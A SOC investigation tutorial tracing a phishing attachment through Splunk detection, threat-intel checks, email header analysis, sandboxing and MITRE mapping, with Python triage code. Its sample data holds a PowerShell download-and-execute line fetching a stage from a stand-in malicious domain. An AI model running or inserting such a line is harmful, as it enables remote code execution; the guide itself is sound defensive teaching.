
INTRODUCTION

This guide demonstrates a complete real-world SOC workflow using:

  • Splunk (Detection & Investigation)
  • Threat Intelligence tools
  • Email Forensics tools
  • Malware Analysis sandbox

The goal is to simulate a realistic attack and show exactly what steps to take using each tool.


🚨 SCENARIO

A suspicious PowerShell execution alert is triggered in Splunk.

We will investigate it step by step.


🔹 STEP 1 — DETECTION IN SPLUNK

What I did:

Opened Splunk → Search & Reporting

Used query:

index=botsv3 sourcetype="WinEventLog:Security" EventCode=4688
| search powershell
| table _time host Account_Name Creator_Process_Name New_Process_Name Process_Command_Line


What I observed:

  • User: finance.user
  • Host: FIN-PC01
  • Parent Process: winword.exe
  • Child Process: powershell.exe
  • Command Line: contains -enc

Interpretation:

  • Word launching PowerShell = suspicious. An Office application has no routine reason to spawn a shell; this is the classic macro-to-PowerShell pattern.
  • Encoded command = high risk. -enc takes the script as Base64 of UTF-16LE text, so the real payload (download URLs, IPs) is only visible after decoding it.
  • Caveat: EventCode 4688 only carries Process_Command_Line if the "Include command line in process creation events" audit policy is enabled on the endpoint. Without it, use Sysmon Event ID 1, which always logs the command line and the parent image.

🔹 STEP 2 — DEEP INVESTIGATION IN SPLUNK

What I did:

Searched for same user activity:

index=botsv3 EventCode=4688
| search Account_Name="finance.user"
| table _time host Creator_Process_Name New_Process_Name Process_Command_Line
| sort _time


What I found:

  • Multiple PowerShell executions
  • Same time window

Interpretation:

  • Not a one-time event
  • Indicates scripted or automated activity

🔹 STEP 3 — EXTRACT INDICATORS

From the decoded -enc payload (the raw command line only shows the Base64 blob), I extracted:

  • Domain: example-malicious.com
  • IP: 185.x.x.x
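To make Steps 1 to 3 concrete, here is the same triage logic (PowerShell child, Office parent, -enc argument, indicator extraction from the decoded script) applied to a few 4688-style events in Python. This is an added example, not code from the original write-up or from Splunk. The events, host names, script, domain and IP address (203.0.113.45, a documentation-range address standing in for the redacted 185.x.x.x) are constructed for the example; the field names follow the Splunk Windows TA extractions used in the queries above.

```python
import base64
import re

# Constructed sample script and 4688-style events for this example. Host names,
# user, paths, the domain and the IP are made up; 203.0.113.45 is from the
# documentation address range, not the redacted 185.x.x.x in the write-up.
SAMPLE_SCRIPT = (
    'IEX (New-Object Net.WebClient).DownloadString('
    '"http://example-malicious.com/stage1.ps1"); '
    'Invoke-WebRequest -Uri "http://203.0.113.45/beacon" -UseBasicParsing'
)
# -EncodedCommand expects Base64 of the script as UTF-16LE text, not UTF-8.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"host": "FIN-PC01", "Account_Name": "finance.user",
     "Creator_Process_Name": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED},
    {"host": "FIN-PC01", "Account_Name": "finance.user",
     "Creator_Process_Name": r"C:\Windows\explorer.exe",
     "New_Process_Name": r"C:\Windows\System32\notepad.exe",
     "Process_Command_Line": "notepad.exe report.txt"},
    {"host": "IT-ADMIN02", "Account_Name": "it.admin",
     "Creator_Process_Name": r"C:\Windows\explorer.exe",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\cleanup.ps1"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# powershell.exe accepts -EncodedCommand, the documented short forms -ec and -e,
# and any unambiguous prefix such as -enc. The argument is a Base64 blob.
_ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
_URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    for flag, blob in _ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def extract_iocs(script):
    """Hostnames from URLs plus any bare IPv4 addresses in a decoded script.
    Hosts are taken only from URLs: matching dotted words anywhere would also
    pick up .NET type names such as Net.WebClient."""
    hosts = {h.lower() for h in _URL_HOST.findall(script)}
    return {"domains": sorted(h for h in hosts if not _IPV4.fullmatch(h)),
            "ips": sorted(set(_IPV4.findall(script)))}


def triage(event):
    """Apply the Step 1 logic to one event: PowerShell child, Office parent, encoded command."""
    child = basename(event.get("New_Process_Name", ""))
    if child not in POWERSHELL:
        return None
    parent = basename(event.get("Creator_Process_Name", ""))
    decoded = decode_encoded_command(event.get("Process_Command_Line", ""))
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append(f"Office application {parent} spawned {child}")
    if decoded is not None:
        reasons.append("encoded command line (-enc)")
    if not reasons:
        return None
    return {
        "host": event["host"], "user": event["Account_Name"],
        "parent": parent, "child": child, "reasons": reasons,
        "severity": "high" if len(reasons) == 2 else "medium",
        "decoded_command": decoded,
        "iocs": extract_iocs(decoded) if decoded else {"domains": [], "ips": []},
    }


def find_suspicious(events):
    """Run triage over a batch of 4688 events and keep the hits."""
    return [f for f in map(triage, events) if f]


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['host']} {f['user']}: " + "; ".join(f["reasons"]))
        print("  decoded:", f["decoded_command"])
        print("  IOCs:", f["iocs"])
```

The admin's `-File cleanup.ps1` run is deliberately left in the sample: it is PowerShell, but with a non-Office parent and no encoded argument it is not flagged, which is the precision the Office-parent plus -enc combination buys over a bare "powershell" search.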

🔹 STEP 4 — THREAT INTELLIGENCE CHECK

Tool 1: VirusTotal

What I did:

  • Opened VirusTotal
  • Searched domain

Result:

  • Flagged as malicious
  • Associated with malware

Tool 2: Talos Intelligence

What I did:

  • Checked domain reputation

Result:

  • Poor reputation

Tool 3: Shodan

What I did:

  • Looked up the IP: open ports, service banners and hosting organisation

Result:

  • Known suspicious hosting

Interpretation:

👉 External infrastructure is malicious


🔹 STEP 5 — EMAIL FORENSICS

Goal:

Find how the user got infected


Tool 1: MX Toolbox (Header Analyzer)

What I did:

  • Pasted the full email header, copied from the original message (a forwarded copy carries the forwarder's headers, not the attacker's)

What I found:

  • SPF: Fail
  • DKIM: Fail
  • DMARC: Fail

These verdicts are read from the Authentication-Results header stamped by the receiving mail gateway. Only trust the line added by your own MX; a sender can insert a fake Authentication-Results header of their own.

Tool 2: EML Analyzer

What I did:

  • Opened email file

What I found:

  • Suspicious attachment
  • External sender

Interpretation:

👉 Phishing email confirmed
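The checks the header analyzer and EML viewer in this step perform, as an added example in Python using only the standard library (not code from the original write-up, MX Toolbox or EML Analyzer). The .eml below is constructed for the example: the addresses, hosts, IP, message ID and attachment name are made up, and the Authentication-Results line stands in for what a receiving MX would stamp.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Constructed .eml for this example. Sender, recipient, hosts, IP, queue ID,
# attachment name and the truncated attachment body are all made up;
# 203.0.113.45 is a documentation-range address.
SAMPLE_EML = b"""Return-Path: <bounce@mail.example-malicious.com>
Received: from mail.example-malicious.com (mail.example-malicious.com [203.0.113.45])
\tby mx.corp.example (Postfix) with ESMTP id 4F2A1C0012
\tfor <finance.user@corp.example>; Mon, 3 Jun 2024 09:12:41 +0000
Authentication-Results: mx.corp.example;
\tspf=fail smtp.mailfrom=mail.example-malicious.com;
\tdkim=fail header.d=bank.example;
\tdmarc=fail header.from=bank.example
From: "Accounts Payable" <invoices@bank.example>
Reply-To: <payments@example-malicious.com>
To: finance.user@corp.example
Subject: Overdue invoice 4471
Date: Mon, 3 Jun 2024 09:12:30 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please review the attached invoice and confirm payment today.
--b1
Content-Type: application/octet-stream; name="Invoice_4471.docm"
Content-Disposition: attachment; filename="Invoice_4471.docm"
Content-Transfer-Encoding: base64

UEsDBBQABgAIAAAAIQA=
--b1--
"""

# Attachment types that run code or carry macros when opened.
RISKY_EXTENSIONS = (".docm", ".xlsm", ".pptm", ".js", ".vbs", ".hta",
                    ".lnk", ".iso", ".img", ".exe", ".scr")
_AUTH_RESULT = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)
_RECEIVED_FROM = re.compile(r"\bfrom\s+([\w.-]+)", re.IGNORECASE)


def domain_of(header_value):
    """Lower-cased domain of the first address in a header ('' if absent)."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def auth_results(msg):
    """spf/dkim/dmarc verdicts from Authentication-Results. Only the header added
    by your own MX is trustworthy; a sender can inject a fake one further down."""
    results = {}
    for value in msg.get_all("Authentication-Results", []):
        for mech, verdict in _AUTH_RESULT.findall(str(value)):
            results.setdefault(mech.lower(), verdict.lower())
    return results


def risky_attachments(msg):
    """File names of attachments whose extension can execute code when opened."""
    names = [part.get_filename() or "" for part in msg.iter_attachments()]
    return [n for n in names if n.lower().endswith(RISKY_EXTENSIONS)]


def analyze(raw_eml):
    """Triage one message the way Step 5 does and return the findings."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    from_domain = domain_of(msg["From"])
    findings = []
    auth = auth_results(msg)
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech) != "pass":
            findings.append(f"{mech.upper()}: {auth.get(mech, 'no result')}")
    # Envelope sender (Return-Path) or Reply-To on a different domain than the
    # displayed From is the usual shape of a spoofed sender.
    for hdr in ("Return-Path", "Reply-To"):
        dom = domain_of(msg[hdr])
        if dom and dom != from_domain:
            findings.append(f"{hdr} domain {dom} differs from From domain {from_domain}")
    for name in risky_attachments(msg):
        findings.append(f"macro-enabled or executable attachment: {name}")
    # The topmost Received header was written by our own gateway; its "from"
    # host is the server that actually handed the message over.
    top_hop = _RECEIVED_FROM.search(str(msg["Received"] or ""))
    return {
        "from_domain": from_domain,
        "received_from": top_hop.group(1).lower() if top_hop else "",
        "auth": auth,
        "findings": findings,
        "verdict": "likely phishing" if len(findings) >= 3 else "needs review",
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_EML)
    print(f"From domain: {report['from_domain']}  delivered by: {report['received_from']}")
    for line in report["findings"]:
        print(" -", line)
    print("Verdict:", report["verdict"])
```

The three authentication failures alone would justify escalation; the domain mismatches and the macro-enabled attachment are what tie the email to the winword.exe → powershell.exe chain seen in Splunk.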


🔹 STEP 6 — MALWARE ANALYSIS

Tool 1: Any.run

What I did:

  • Uploaded the suspicious attachment (free-tier Any.run tasks are public, so check policy first if the document may contain company data)

What I observed:

  • winword.exe spawning powershell.exe, the same parent/child pair seen in the 4688 event
  • Outbound network connection to the domain extracted in Step 3

Tool 2: Hybrid Analysis

What I did:

  • Submitted file

Result:

  • Malicious score high
  • Behavior confirmed

Interpretation:

👉 File is malicious


🔹 STEP 7 — FULL ATTACK CHAIN

What I reconstructed:

  1. User receives phishing email
  2. User opens attachment
  3. Word launches PowerShell
  4. PowerShell executes encoded command
  5. Connects to malicious domain

🔹 STEP 8 — MITRE MAPPING

Mapped techniques:

  • T1566.001 — Phishing: Spearphishing Attachment
  • T1204.002 — User Execution: Malicious File
  • T1059.001 — Command and Scripting Interpreter: PowerShell
  • T1027.010 — Obfuscated Files or Information: Command Obfuscation (the -enc argument)

🔹 STEP 9 — TICKET CREATION

What I wrote:

"Suspicious PowerShell execution detected on FIN-PC01.

Parent process: winword.exe
Encoded command observed
Malicious domain confirmed via threat intelligence
Email analysis indicates phishing origin

Escalating for further investigation."


🔹 STEP 10 — DASHBOARD CREATION

What I did:

  • Saved the Step 1 search as a report in Splunk
  • Added it as a panel to a dashboard

Panel Title:

PowerShell Abuse – MITRE T1059.001


Purpose:

  • Monitor similar attacks
  • Track patterns
  • Provide visibility

🔹 STEP 11 — FINAL LEARNING (VERY IMPORTANT)

What I learned:

  • Splunk gives detection
  • Threat intel confirms indicators
  • Email shows entry point
  • Malware confirms behavior

🧠 FINAL FLOW SUMMARY

Splunk → Detect
Threat Intel → Validate
Email → Entry point
Malware → Confirm
Dashboard → Monitor
Ticket → Escalate

